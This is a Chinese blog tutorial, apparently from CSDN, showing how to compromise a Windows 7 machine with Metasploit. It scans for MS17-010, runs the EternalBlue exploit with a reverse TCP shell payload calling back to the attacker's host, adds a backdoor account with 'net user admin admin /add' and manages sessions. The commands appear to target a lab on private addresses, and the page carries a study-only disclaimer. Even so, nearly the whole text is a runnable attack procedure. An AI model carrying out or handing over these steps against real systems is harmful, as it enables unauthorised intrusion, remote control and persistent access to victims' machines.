使用msf渗透Win7主机并远程执行命令

13 篇文章 0 订阅

本文仅用于学习和研究,切勿用于非法用途,本文不承担任何法律责任

1.1 通过 msf 模块获取 Win7 主机远程 shell
1.1.1 我们先进入msf
msf5 > msfdb run
在这里插入图片描述

1.1.2我们再扫描目标是否存在 ms17-010 漏洞
msf5 > search ms17-01
在这里插入图片描述

1.1.3 我们使用 use 命令选中这个模块
msf5 > use auxiliary/scanner/smb/smb_ms17_010
然后我们查看模块需要配置的信息
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
在这里插入图片描述

1.1.4 紧接着我们配置 RHOST 主机 IP
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.10
开始扫描
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
在这里插入图片描述

1.1.5 我们接着查找攻击模块
msf5 > search ms17-010
并使用 use 命令加载模块
msf5 > use exploit/windows/smb/ms17_010_eternalblu
在这里插入图片描述

1.1.6 然后我们查看模块需要配置的信息
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
在这里插入图片描述

1.1.7 紧接着我们设置一下目标主机 IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
并查看 exploit target 目标类型:
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
在这里插入图片描述

我们可以看到这个模块只有一个 target,所以默认就选择这个目标系统。所以我们就不需要手动设置。
1.1.8然后我们找一个 payload,获取 shell 远程连接权限后,进行远程执行命令
msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload
在这里插入图片描述

1.1.9 然后我们设置一下payload msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/shell/reverse_tcp
在这里插入图片描述

1.1.10 我们查看一下 payloads 需要配置什么信息
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
在这里插入图片描述

1.1.11 我们设置一下本机 payload 监听地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.11
在这里插入图片描述

1.1.12 配置完成后我们开始执行
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
在这里插入图片描述

可以看见我们这边已经出现了目标主机也就是win7的shell
这边需要注意的一点是,如果我们出现win之后还是没有出现shell,我们回车一下就可以了

1.1.13 然后我们使用 DOS 命令创建用户
C:\Windows\system32>net user admin admin /add (注意/add前的空格)
我这边第一次漏打空格了,但是以为win编码和lin不一样,使用这边看不出来
所以我们这边要换一下编码 C:\Windows\system32>chcp 65001
在这里插入图片描述

1.1.14 然后我们再试一下,可以看到我们已经执行成功(刚才确实漏打了)
在这里插入图片描述

1.1.15 我们查看一下靶机上的用户
C:\Windows\system32>net user
在这里插入图片描述

可以看到我们新添加的用户admin

1.1.16 然后我们查看拿到的用户权限
C:\Windows\system32>whoami

在这里插入图片描述

这边去win7系统里看一下,确实多出来我们的新加的用户admin
在这里插入图片描述

1.2 通过会话进行连接目标机

1.2.1 我们先关闭链接
Ctrl+c
Abort session 1? [y/N] y
然后我们
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机
在这里插入图片描述

1.2.2 接着我们查看我们当前的会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
在这里插入图片描述

1.2.3 然后我们可以通过会话 Id 进入会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
在这里插入图片描述

1.2.4 background退出会话将会话保存到后台
C:\Windows\system32>background

在这里插入图片描述

1.2.5然后可以根据会话id来结束会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
然后我们再查看一下会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
可以看到我们的刚才id为2的会话已经结束了
在这里插入图片描述

参与评论 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:大白 设计师:CSDN官方博客 返回首页

打赏作者

confined.

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值